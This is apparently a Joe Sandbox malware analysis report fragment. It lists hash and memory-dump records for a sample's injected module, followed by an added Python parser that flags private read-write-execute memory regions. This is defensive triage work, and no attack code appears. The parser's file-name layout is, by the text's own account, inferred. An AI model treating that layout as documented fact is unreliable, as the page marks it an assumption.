• Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
• Instruction Fuzzy Hash: 31A0124040486052C54033184C0253430449810A20FC4878068F8403D0E91D452080F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
• Instruction ID: 41b88363666640e9d25608007880aa7097111d96eeba597bd4d77e8dcfb9904c
• Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
• Instruction Fuzzy Hash: 1F51432160068497DFF48A6895557BF23CA9F52308F0B8A29DBC297781C715EE42C62D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
• Instruction ID: 079e15be7a74b211d4db4ed27f1d410c6efee68b21b6823ffa3e0c9ffc83df02
• Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
• Instruction Fuzzy Hash: F851A56160068657DFF4892884547BF63EADF02308F2B0849DB86CBBC1C725DE46C36E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
• Instruction ID: cdd5a82420af1c8aa9d65767f302305b333654075b8968f9bcfb6bbcb06a326b
• Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
• Instruction Fuzzy Hash: D7412375918B058FC324CE29C58061BFBE1FBC8314F148A2EF99A93350D775E980CB82
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f2cbc3ef723e4b3c396aaf57060077168d27b39940edee7cc2abc770469516ea
• Instruction ID: 4721ba8986872c2bffac2ebf25a36491b9b57220afc5d969eb5b902c07a6e908
• Opcode Fuzzy Hash: f2cbc3ef723e4b3c396aaf57060077168d27b39940edee7cc2abc770469516ea
• Instruction Fuzzy Hash: D4322322D69F414DD7239634D962335A688AFB73C9F15E737E81AB5DEAEB28C4C34100
Memory Dump Source
• Source File: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c093fbe60df72634ee81267e716a17191ba0b5ae86ed72f8f9866a7166f4e77c
• Instruction ID: 6d137b5e7147fe9b722a562813be63ff153078345ecf33b64f051dac354e8ae3
• Opcode Fuzzy Hash: c093fbe60df72634ee81267e716a17191ba0b5ae86ed72f8f9866a7166f4e77c
• Instruction Fuzzy Hash: F73205A284E7C28FC3178B348C66591BFB1AE6321871E85DBC0C1CF5A3E2195D5AD762
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
• Instruction ID: 27352dee8e992f7320d5f58b80a161fc6c29886911e00db436555e353192d6cf
• Opcode Fuzzy Hash: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
• Instruction Fuzzy Hash: 2A32C071608B459BC725DF68E48076ABBE9FF88308F444A2DE8A58B381D770DD45CBD2
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
• Instruction ID: 8ff56f1bb405ba4385d7efbe64ad0bb4d9d4603fe8f1255eda4951f71f060b58
• Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
• Instruction Fuzzy Hash: 98027D717046518FD318CF2EE880636B7E1AF8A301B46863EE4D5C7395EB34E926CB95
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
• Instruction ID: 4c4e04f6816288a7b970f67ae134d93e369559c212f6f9ca93fccf76235d1aa6
                                                                                                                        • Opcode Fuzzy Hash: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                                                                                        • Instruction Fuzzy Hash: FEF16C756142548FC714DF1DE89187BB3E1EB8A300B460A2EF1C2C7391DB74EA1ACB66
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b12bffaf184e2118b61cdb5db2232eefa3f480fab81911404f7d7ec5672b2d9e
                                                                                                                        • Instruction ID: c7b20471d1c060aa58b6763351a6d0397b45ca69bd294928364a89f9bda91b56
                                                                                                                        • Opcode Fuzzy Hash: b12bffaf184e2118b61cdb5db2232eefa3f480fab81911404f7d7ec5672b2d9e
                                                                                                                        • Instruction Fuzzy Hash: FAD15C729087158FCB21EE28C8846AEB7E5FF94394F440A2DE896D7360E730DD05DB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9f1948302b2909565ffaec1bc44114e62a7ee68aa39f2c33fc1b5e59dc74898b
                                                                                                                        • Instruction ID: 277d881f43f5e4de1522bc264a595aa38c23a638420e67b7b9de843d41e39bfb
                                                                                                                        • Opcode Fuzzy Hash: 9f1948302b2909565ffaec1bc44114e62a7ee68aa39f2c33fc1b5e59dc74898b
                                                                                                                        • Instruction Fuzzy Hash: 41B1466490E3C58FC7032B7888751963F71DF4731875A4AD7C584CF2A3C569AC2ADBA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff6a89de3862892f8417cbc7ebe7f18fa3f3c0dd5d5ea9d8ccd6ca2ccd0b5062
                                                                                                                        • Instruction ID: f84bcebcc6e9ed10368e0184293744f98ac9b2db2d18635aa21b9fa7a2041d74
                                                                                                                        • Opcode Fuzzy Hash: ff6a89de3862892f8417cbc7ebe7f18fa3f3c0dd5d5ea9d8ccd6ca2ccd0b5062
                                                                                                                        • Instruction Fuzzy Hash: 11B1266490E3C18FC7032B7998741963F31DF4B31475A4AD7C584CF2A7C569AC1ADBA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                                                        • Instruction ID: 3e3dfc4473a4b6c4095c011e32387ba508aa1eefdc6a22fd81e73500b5e9b31f
                                                                                                                        • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                                                        • Instruction Fuzzy Hash: DBB1833911469A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF756D3358506EB74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction ID: 9886c2e877911c52d117b5f84656f1827de1cb8efc98a0bae536955cf57d3f4a
                                                                                                                        • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction Fuzzy Hash: 9FB107365506089FD715CF28C4CABA57BA0FB45768F29D658E899CF2E3C335E982CB40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction ID: 110c520e90f783ba98f41b3abbb7838c15362a1d4646e5d71621354a66c022c7
                                                                                                                        • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction Fuzzy Hash: 4561587160060966EAF8AE685894BBF7395EF41708F474419EF82FF380D791DE42CA2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction ID: ea5610bbc2a4530eb9a241c4481000a2744c8f72fec4873615c909d186c60995
                                                                                                                        • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction Fuzzy Hash: A2617A3160068866DEF89A289894BFF63A9EF0270CF074519EB82DF390DB55DD41CB9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction ID: af941638f0bbe1c5c99c02442b10acc583b73cd913109daab3d9b2e5a89b7098
                                                                                                                        • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction Fuzzy Hash: 76614C325083059BC708DE34D581A5BBBEAEFDC754F540D2EF4999A250EB30EE088B92
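The dump-file names in the Memory Dump Source records above carry the Windows attributes of each memory region, and those attributes are the security-relevant part of these records: every region in the 02D30000 group is committed private memory rather than a loader-mapped image, yet the report reconstructs a PE from it, and four of the regions (02DB7000, 02E2D000, 02EAB000, 02EAE000) are readable, writable and executable at once. That is the shape of a payload unpacked or manually mapped into allocated memory. The following parser is an added example, not Joe Sandbox code; the field layout it assumes (process index, stage, dump id, base address, protection, state, type, reserved) is inferred from the values on this page, which line up exactly with the winnt.h MEMORY_BASIC_INFORMATION constants (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE). The sample names are the ones listed in the records above.

```python
"""Decode Joe Sandbox .sdmp names into Windows region attributes and flag
committed, private, writable+executable regions (typical of unpacked code).

Assumed name layout (an assumption, not documented on the report page):
  <proc>.<stage>.<dump>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# winnt.h constants
PAGE_MODIFIERS = ((0x100, "GUARD"), (0x200, "NOCACHE"), (0x400, "WRITECOMBINE"))
PROTECT_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",
                 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
MEM_COMMIT, MEM_PRIVATE = 0x1000, 0x20000
STATE_NAMES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
TYPE_NAMES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_NAME_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<reserved>[0-9A-Fa-f]{8})\.sdmp$")
# The report's "Source File:" line; "Offset" is the base of the reconstructed PE.
_SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")


@dataclass(frozen=True)
class Region:
    name: str
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        core = self.protect & 0xFF
        mods = [n for bit, n in PAGE_MODIFIERS if self.protect & bit]
        return "|".join([PROTECT_NAMES.get(core, f"0x{core:02X}")] + mods)

    @property
    def executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE

    @property
    def suspicious(self) -> bool:
        """Committed, private (not file-backed) RWX memory: rarely legitimate
        outside JIT engines, routinely what an unpacker or injector leaves."""
        return (self.state == MEM_COMMIT and self.mem_type == MEM_PRIVATE
                and self.executable and self.writable)


def parse_dump_name(name: str) -> Region:
    m = _NAME_RE.search(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return Region(name=name, base=int(m["base"], 16), protect=int(m["protect"], 16),
                  state=int(m["state"], 16), mem_type=int(m["type"], 16))


def parse_source_line(line: str) -> Tuple[Region, int, bool, int]:
    """Return (region, module base, based-on-PE flag, region offset into the PE)."""
    m = _SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    region = parse_dump_name(m["name"])
    module_base = int(m["offset"], 16)
    return region, module_base, m["pe"] == "true", region.base - module_base


def describe(region: Region) -> str:
    return (f"{region.base:#010x} {region.protect_name} "
            f"{STATE_NAMES.get(region.state, hex(region.state))} "
            f"{TYPE_NAMES.get(region.mem_type, hex(region.mem_type))}")


def triage(names: List[str]) -> List[int]:
    """Bases of every committed private RWX region, sorted, without duplicates."""
    return sorted({r.base for r in map(parse_dump_name, names) if r.suspicious})


# Region names as listed in the records above.
REPORT_REGIONS = [
    "00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for n in REPORT_REGIONS:
        r = parse_dump_name(n)
        print(describe(r), "<-- RWX private" if r.suspicious else "")
    print("flagged:", [hex(b) for b in triage(REPORT_REGIONS)])
```

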